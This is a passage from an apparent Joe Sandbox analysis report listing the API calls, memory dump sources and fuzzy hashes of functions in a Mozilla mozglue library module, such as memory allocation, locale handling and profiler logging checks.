                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DEA3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA0DEE9
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9FDEFD,?,6C9C4A68), ref: 6CA0DF32
                                                                    • Part of subcall function 6CA0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CA0DB86
                                                                    • Part of subcall function 6CA0DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CA0DC0E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C9FDEFD,?,6C9C4A68), ref: 6CA0DF65
                                                                  • free.MOZGLUE(?), ref: 6CA0DF80
                                                                    • Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
                                                                    • Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
                                                                    • Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                  • String ID:
                                                                  • API String ID: 112305417-0
                                                                  • Opcode ID: 3c3302cb0316099f62dcbe6b065b8550762733250ea06249b232bf6c6e9285c3
                                                                  • Instruction ID: 688cc26c3fbf8ba275073ba85c10a49a22990731232e3c1e816d1e86580d4fe9
                                                                  • Opcode Fuzzy Hash: 3c3302cb0316099f62dcbe6b065b8550762733250ea06249b232bf6c6e9285c3
                                                                  • Instruction Fuzzy Hash: CB51C977F017119BD7119B18E8806AEB372BFA178CF59451CD41A53B00D731F899CB92
                                                                  APIs
                                                                  • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D32
                                                                  • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D62
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D6D
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15D84
                                                                  • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15DA4
                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15DC9
                                                                  • std::_Facet_Register.LIBCPMT ref: 6CA15DDB
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15E00
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6CA15C8C,?,6C9EE829), ref: 6CA15E45
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 2325513730-0
                                                                  • Opcode ID: 23812aefa1843b3667f06876475f2858843b12afd4719fb6fbc8a0a4de397984
                                                                  • Instruction ID: 2323f0caab8312e11cf3a5541244b19f863ba2430573476574e9188850e045ee
                                                                  • Opcode Fuzzy Hash: 23812aefa1843b3667f06876475f2858843b12afd4719fb6fbc8a0a4de397984
                                                                  • Instruction Fuzzy Hash: D941D5307043058FDB14DF65DC99AAD77B6EF89358F088169D50A9BB81DB34DC46CB60
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C9B31A7), ref: 6C9ECDDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 4275171209-2186867486
                                                                  • Opcode ID: 3745dd134d49d7fd2b85e663dbce110aa97ac8e9631459e759652f4adf5cec35
                                                                  • Instruction ID: 736213b765598456f953d2d5a6f24a4adb78b49d3cbc6cb3cfa1d4b2d12ba1e3
                                                                  • Opcode Fuzzy Hash: 3745dd134d49d7fd2b85e663dbce110aa97ac8e9631459e759652f4adf5cec35
                                                                  • Instruction Fuzzy Hash: 8D31D630B403169BEF16AEA98C55BAE7F7ABF59714F304518F658EB6C0DB70D80187A0
                                                                  APIs
                                                                    • Part of subcall function 6C9BF100: LoadLibraryW.KERNEL32(shell32,?,6CA2D020), ref: 6C9BF122
                                                                    • Part of subcall function 6C9BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C9BF132
                                                                  • moz_xmalloc.MOZGLUE(00000012), ref: 6C9BED50
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C9BEDAC
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C9BEDCC
                                                                  • CreateFileW.KERNEL32 ref: 6C9BEE08
                                                                  • free.MOZGLUE(00000000), ref: 6C9BEE27
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C9BEE32
                                                                    • Part of subcall function 6C9BEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C9BEBB5
                                                                    • Part of subcall function 6C9BEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C9ED7F3), ref: 6C9BEBC3
                                                                    • Part of subcall function 6C9BEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C9ED7F3), ref: 6C9BEBD6
                                                                  Strings
                                                                  • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C9BEDC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                  • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                  • API String ID: 1980384892-344433685
                                                                  • Opcode ID: 857621ed5222b6bf436b4289a86126557e59d432faa8dbfb88352c06f5381418
                                                                  • Instruction ID: a15b0447af661ab4a9d7f42ba240550bcee8131f2c4007e41020dffda99d9723
                                                                  • Opcode Fuzzy Hash: 857621ed5222b6bf436b4289a86126557e59d432faa8dbfb88352c06f5381418
                                                                  • Instruction Fuzzy Hash: 5651F171D05318ABDB01DF68C8446EFB7B8AF69318F04846DE8557B740E774E988C7A2
                                                                  APIs
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CA2A565
                                                                    • Part of subcall function 6CA2A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA2A4BE
                                                                    • Part of subcall function 6CA2A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA2A4D6
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CA2A65B
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CA2A6B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                  • String ID: 0$z
                                                                  • API String ID: 310210123-2584888582
                                                                  • Opcode ID: 8093a117ef299489c7265058dcfb996dc5edb3dae64966d563553f5c3dc86fa2
                                                                  • Instruction ID: 40faabbfe3888b9619387715c25ea2c6e65d6523ff245a40819afe60c8eba358
                                                                  • Opcode Fuzzy Hash: 8093a117ef299489c7265058dcfb996dc5edb3dae64966d563553f5c3dc86fa2
                                                                  • Instruction Fuzzy Hash: 314139719097459FC341DF28C480A8FBBF5BF99354F448A2EF49987650EB34D989CB82
                                                                  APIs
                                                                  • free.MOZGLUE(?,6CA3008B), ref: 6C9B7B89
                                                                  • free.MOZGLUE(?,6CA3008B), ref: 6C9B7BAC
                                                                    • Part of subcall function 6C9B78C0: free.MOZGLUE(?,6CA3008B), ref: 6C9B7BCF
                                                                  • free.MOZGLUE(?,6CA3008B), ref: 6C9B7BF2
                                                                    • Part of subcall function 6C9D5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C9D5EDB
                                                                    • Part of subcall function 6C9D5E90: memset.VCRUNTIME140(6CA17765,000000E5,55CCCCCC), ref: 6C9D5F27
                                                                    • Part of subcall function 6C9D5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C9D5FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeavememset
                                                                  • String ID:
                                                                  • API String ID: 3977402767-0
                                                                  • Opcode ID: ad8eb8f4f46a1c3b9817a52cc9dbde80e8d2123c33de30a941be3ff5c851eec6
                                                                  • Instruction ID: 2665b18e3e03000b6cb933b11382fa25f61073670e69ca8ee1f75eb65389e5e1
                                                                  • Opcode Fuzzy Hash: ad8eb8f4f46a1c3b9817a52cc9dbde80e8d2123c33de30a941be3ff5c851eec6
                                                                  • Instruction Fuzzy Hash: 53C1B671E011299BEB248B28CC90BAEB772AF51314F1547A9D41AF7BC0C731EE858F61
                                                                  APIs
                                                                    • Part of subcall function 6C9EAB89: EnterCriticalSection.KERNEL32(6CA3E370,?,?,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284), ref: 6C9EAB94
                                                                    • Part of subcall function 6C9EAB89: LeaveCriticalSection.KERNEL32(6CA3E370,?,6C9B34DE,6CA3F6CC,?,?,?,?,?,?,?,6C9B3284,?,?,6C9D56F6), ref: 6C9EABD1
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C9C4A68), ref: 6C9F945E
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C9F9470
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C9F9482
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9F949F
                                                                  Strings
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C9F9459
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C9F947D
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C9F946B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                  • API String ID: 4042361484-1628757462
                                                                  • Opcode ID: 56f54aab36795aa8b6ccf0fc8875b7ed902ac7e856af44d2de4b83836ad3ccfa
                                                                  • Instruction ID: b1035a8adaf52a2301479520f20e761c1e4a01099db15c4c2e89d37e76d0c2ef
                                                                  • Opcode Fuzzy Hash: 56f54aab36795aa8b6ccf0fc8875b7ed902ac7e856af44d2de4b83836ad3ccfa
                                                                  • Instruction Fuzzy Hash: 7C016D34A002229BD7149F1CED749453378AB1632CF09453BD91EC6B41D725D4978A6B
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA00F6B
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA00F88
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6CA00FF7
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6CA01067
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6CA010A7
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6CA0114B
                                                                    • Part of subcall function 6C9F8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6CA11563), ref: 6C9F8BD5
                                                                  • free.MOZGLUE(?), ref: 6CA01174
                                                                  • free.MOZGLUE(?), ref: 6CA01186
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                  • String ID:
                                                                  • API String ID: 2803333873-0
                                                                  • Opcode ID: c3c6b53cfa2dacf6e40ce2fdb1f10301fddf00576a02a9d142b3013d718ad814
                                                                  • Instruction ID: 82e714d044665f11cd770dfbd4d0c32e45d1db2e4d975bacffd1dcfd9ad28c12
                                                                  • Opcode Fuzzy Hash: c3c6b53cfa2dacf6e40ce2fdb1f10301fddf00576a02a9d142b3013d718ad814
                                                                  • Instruction Fuzzy Hash: 8761E075A043419BCB14CF24E9807AAB7F6BFD934CF04891DE98947712EB31E889CB81
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB6AC
                                                                    • Part of subcall function 6C9CCA10: malloc.MOZGLUE(?), ref: 6C9CCA26
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB6D1
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB6E3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB70B
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB71D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C9BB61E), ref: 6C9BB73F
                                                                  • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB760
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C9BB61E,?,?,?,?,?,00000000), ref: 6C9BB79A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                  • String ID:
                                                                  • API String ID: 1394714614-0
                                                                  • Opcode ID: bf97676e2a77a9a02bd8eb6c4a84e68db60b0c08b4520fe63344f76e1369df9f
                                                                  • Instruction ID: 4597c38385d694ac31b2d55e3a51722bbd42a27bf851e123b7605e31a491a50d
                                                                  • Opcode Fuzzy Hash: bf97676e2a77a9a02bd8eb6c4a84e68db60b0c08b4520fe63344f76e1369df9f
                                                                  • Instruction Fuzzy Hash: 5541A1B2D00115AFCB14DF68DCD46AFB7B9FB54324B290629E825E7780E731E9058BE1
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(6CA35104), ref: 6C9BEFAC
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C9BEFD7
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9BEFEC
                                                                  • free.MOZGLUE(?), ref: 6C9BF00C
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C9BF02E
                                                                  • memcpy.VCRUNTIME140(00000000,?), ref: 6C9BF041
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C9BF065
                                                                  • moz_xmalloc.MOZGLUE ref: 6C9BF072
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 1148890222-0
                                                                  • Opcode ID: b2d16110ea433534adcdfa0e47144f655776ff76ccacf685fa16a45c6acb8d09
                                                                  • Instruction ID: c67efad1781191e47b441b7d795fe88a6671aa17a79ed227b1280da9bcca50e0
                                                                  • Opcode Fuzzy Hash: b2d16110ea433534adcdfa0e47144f655776ff76ccacf685fa16a45c6acb8d09
                                                                  • Instruction Fuzzy Hash: 1841F8B5A00216AFCB18CF68DC805BF7769AF94328B244628E815D77A4EB31E915C7E1
                                                                  APIs
                                                                  • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6CA2B5B9
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CA2B5C5
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CA2B5DA
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CA2B5F4
                                                                  • __Init_thread_footer.LIBCMT ref: 6CA2B605
                                                                  • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6CA2B61F
                                                                  • std::_Facet_Register.LIBCPMT ref: 6CA2B631
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CA2B655
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 1276798925-0
                                                                  • Opcode ID: 8714c2ed815d369f90424956f5b0dd155b9b377b79165d81890cc98d4646ca7f
                                                                  • Instruction ID: 2fc1d8e8172da66da721d9a158f78fdd4b3ce6bc8ffde899f920958c559ae9d2
                                                                  • Opcode Fuzzy Hash: 8714c2ed815d369f90424956f5b0dd155b9b377b79165d81890cc98d4646ca7f
                                                                  • Instruction Fuzzy Hash: 1531F671B00312CBCB15DB54DC688AE77B5FF9A368B084559E90AD7340CB3498478B91
                                                                  APIs
                                                                  • free.MOZGLUE(?,?,?,6CA17ABE), ref: 6C9C985B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6CA17ABE), ref: 6C9C98A8
                                                                  • moz_xmalloc.MOZGLUE(00000020), ref: 6C9C9909
                                                                  • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C9C9918
                                                                  • free.MOZGLUE(?), ref: 6C9C9975
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 1281542009-0
                                                                  • Opcode ID: 3ddf64aed1b1ee63631737683a9a431a77745063b02be2f94d059fc0eecf4d81
                                                                  • Instruction ID: 426d91fcbb29cde57a87691a1e0f5d7ee959af6e61c154d25bb87291170f316e
                                                                  • Opcode Fuzzy Hash: 3ddf64aed1b1ee63631737683a9a431a77745063b02be2f94d059fc0eecf4d81
                                                                  • Instruction Fuzzy Hash: D8718B75604706CFC725CF28C480966B7F5FF4A3287264AA9D85A8BBA0D731F846CB52
                                                                  APIs
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE,?,?,6C9FDC2C), ref: 6C9CB7E6
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE,?,?,6C9FDC2C), ref: 6C9CB80C
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE), ref: 6C9CB88E
                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6CA0CC83,?,?,?,?,?,?,?,?,?,6CA0BCAE,?,?,6C9FDC2C), ref: 6C9CB896
                                                                  Memory Dump Source
